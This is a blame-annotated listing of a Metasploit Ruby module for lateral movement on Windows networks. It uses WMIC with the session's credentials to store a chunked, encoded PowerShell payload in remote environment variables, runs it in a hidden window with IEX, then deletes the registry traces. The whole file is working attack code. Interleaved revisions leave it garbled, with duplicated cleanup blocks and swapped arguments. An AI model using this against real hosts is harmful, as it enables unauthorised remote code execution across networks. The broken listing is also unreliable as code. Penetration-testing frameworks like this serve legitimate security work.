2013-09-20 12:40:28 +00:00
|
|
|
##
|
2013-10-30 20:14:16 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-09-20 12:40:28 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
2013-10-26 02:41:24 +00:00
|
|
|
require 'msf/core/exploit/powershell'
|
2013-09-20 12:40:28 +00:00
|
|
|
require 'rex'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Local
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Powershell
|
2013-12-14 20:05:51 +00:00
|
|
|
include Msf::Post::Windows::WMIC
|
2013-09-20 12:40:28 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
2013-09-20 16:18:14 +00:00
|
|
|
'Name' => 'Windows Management Instrumentation (WMI) Remote Command Execution',
|
2013-09-20 12:40:28 +00:00
|
|
|
'Description' => %q{
|
2013-09-20 16:18:14 +00:00
|
|
|
This module executes powershell on the remote host using the current
|
|
|
|
user credentials or those supplied. Instead of using PSEXEC over TCP
|
|
|
|
port 445 we use the WMIC command to start a Remote Procedure Call on
|
2013-09-20 17:36:24 +00:00
|
|
|
TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel
|
|
|
|
traffic through that session.
|
2013-09-20 12:40:28 +00:00
|
|
|
|
|
|
|
The result is similar to psexec but with the added benefit of using
|
|
|
|
the session's current authentication token instead of having to know
|
|
|
|
a password or hash.
|
2013-09-20 16:18:14 +00:00
|
|
|
|
|
|
|
We do not get feedback from the WMIC command so there are no
|
|
|
|
indicators of success or failure. The remote host must be configured
|
|
|
|
to allow remote Windows Management Instrumentation.
|
2013-09-20 12:40:28 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [
|
2014-04-09 15:46:10 +00:00
|
|
|
'Ben Campbell'
|
2013-09-20 12:40:28 +00:00
|
|
|
],
|
2013-09-20 16:18:14 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
2013-09-20 12:40:28 +00:00
|
|
|
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
|
|
|
[ 'OSVDB', '3106'],
|
2013-09-20 16:18:14 +00:00
|
|
|
[ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
|
2013-09-20 12:40:28 +00:00
|
|
|
],
|
2013-09-20 16:18:14 +00:00
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'thread',
|
|
|
|
'WfsDelay' => '15',
|
|
|
|
},
|
2013-09-20 12:40:28 +00:00
|
|
|
'DisclosureDate' => 'Jan 01 1999',
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
|
|
|
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options([
|
2013-09-20 16:18:14 +00:00
|
|
|
OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
|
2013-09-20 17:36:24 +00:00
|
|
|
# Move this out of advanced
|
|
|
|
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
|
2013-09-20 12:40:28 +00:00
|
|
|
])
|
2013-12-14 20:05:51 +00:00
|
|
|
|
|
|
|
deregister_options("RHOST")
|
2013-09-20 12:40:28 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2013-09-20 16:18:14 +00:00
|
|
|
if datastore['SMBUser'] and datastore['SMBPass'].nil?
|
|
|
|
fail_with(Failure::BadConfig, "Need both username and password set.")
|
|
|
|
end
|
|
|
|
|
|
|
|
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
|
2013-12-14 20:05:51 +00:00
|
|
|
run_host(server)
|
|
|
|
end
|
|
|
|
end
|
2013-09-20 18:33:27 +00:00
|
|
|
|
2013-12-14 20:05:51 +00:00
|
|
|
def run_host(server)
|
|
|
|
# Get the PSH Payload and split it into bitesize chunks
|
|
|
|
# 1024 appears to be the max value allowed in env vars
|
2014-04-15 21:06:45 +00:00
|
|
|
psh = cmd_psh_payload(payload.encoded,
|
|
|
|
payload_instance.arch.first,
|
|
|
|
{
|
|
|
|
:remove_comspec => true,
|
|
|
|
:encode_inner_payload => true,
|
|
|
|
:use_single_quotes => true
|
|
|
|
})
|
|
|
|
chunks = split_code(psh, 1000)
|
2013-12-14 20:05:51 +00:00
|
|
|
|
|
|
|
begin
|
|
|
|
print_status("[#{server}] Storing payload in environment variables")
|
|
|
|
env_name = rand_text_alpha(rand(3)+3)
|
|
|
|
env_vars = []
|
|
|
|
0.upto(chunks.length-1) do |i|
|
|
|
|
env_vars << "#{env_name}#{i}"
|
|
|
|
c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
|
|
|
|
result = wmic_command(c, server)
|
|
|
|
|
|
|
|
unless result
|
|
|
|
print_error("[#{server}] WMIC command error - skipping host")
|
|
|
|
return false
|
2013-09-20 18:33:27 +00:00
|
|
|
end
|
2013-12-14 20:05:51 +00:00
|
|
|
end
|
2013-09-20 18:33:27 +00:00
|
|
|
|
2013-12-14 20:05:51 +00:00
|
|
|
x = rand_text_alpha(rand(3)+3)
|
2014-04-15 21:06:45 +00:00
|
|
|
exec_cmd = generate_psh_command_line({
|
|
|
|
:noprofile => true,
|
|
|
|
:windowstyle => 'hidden',
|
|
|
|
:command => "$#{x}=''"
|
|
|
|
})
|
2013-12-14 20:05:51 +00:00
|
|
|
env_vars.each do |env|
|
|
|
|
exec_cmd << "+$env:#{env}"
|
2013-09-20 16:18:14 +00:00
|
|
|
end
|
2013-12-14 20:05:51 +00:00
|
|
|
exec_cmd << ";IEX $#{x};"
|
2013-09-20 16:18:14 +00:00
|
|
|
|
2013-12-14 20:05:51 +00:00
|
|
|
print_status("[#{server}] Executing payload")
|
|
|
|
result = wmic_command(exec_cmd, server)
|
2013-09-20 18:33:27 +00:00
|
|
|
|
2013-12-14 20:05:51 +00:00
|
|
|
if result
|
|
|
|
if result[:return] == 0
|
|
|
|
print_good("[#{server}] Process Started PID: #{result[:pid]}")
|
|
|
|
else
|
|
|
|
print_error("[#{server}] failed, Return Value: #{result[:return]})")
|
2013-09-20 18:33:27 +00:00
|
|
|
end
|
2013-09-20 16:18:14 +00:00
|
|
|
else
|
2013-12-14 20:05:51 +00:00
|
|
|
print_error("[#{server}] failed...)")
|
2013-09-20 16:18:14 +00:00
|
|
|
end
|
|
|
|
|
2014-04-15 21:06:45 +00:00
|
|
|
print_status("[#{server}] Cleaning up environment variables")
|
|
|
|
env_vars.each do |env|
|
|
|
|
cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
|
|
|
|
wmic_command(server, cleanup_cmd)
|
|
|
|
end
|
|
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
|
|
print_error("[#{server}] Error moving on... #{e}")
|
|
|
|
next
|
|
|
|
ensure
|
|
|
|
select(nil,nil,nil,2)
|
2013-09-20 16:18:14 +00:00
|
|
|
end
|
|
|
|
end
|
2014-04-15 21:06:45 +00:00
|
|
|
|
2013-09-20 16:18:14 +00:00
|
|
|
def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
|
|
|
|
userpass = ""
|
|
|
|
|
|
|
|
unless user.nil?
|
|
|
|
if domain.nil?
|
|
|
|
userpass = "/user:\"#{user}\" /password:\"#{pass}\" "
|
|
|
|
else
|
|
|
|
userpass = "/user:\"#{domain}\\#{user}\" /password:\"#{pass}\" "
|
2013-09-20 12:40:28 +00:00
|
|
|
end
|
|
|
|
|
2013-12-14 20:05:51 +00:00
|
|
|
print_status("[#{server}] Cleaning up environment variables")
|
|
|
|
env_vars.each do |env|
|
|
|
|
cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
|
|
|
|
wmic_command(cleanup_cmd, server)
|
|
|
|
end
|
|
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
|
|
print_error("[#{server}] Error moving on... #{e}")
|
|
|
|
return false
|
|
|
|
end
|
2013-09-20 16:18:14 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def split_code(psh, chunk_size)
|
|
|
|
array = []
|
|
|
|
idx = 0
|
|
|
|
while (idx < psh.length)
|
|
|
|
array << psh[idx, chunk_size]
|
|
|
|
idx += chunk_size
|
|
|
|
end
|
|
|
|
return array
|
2013-09-20 12:40:28 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|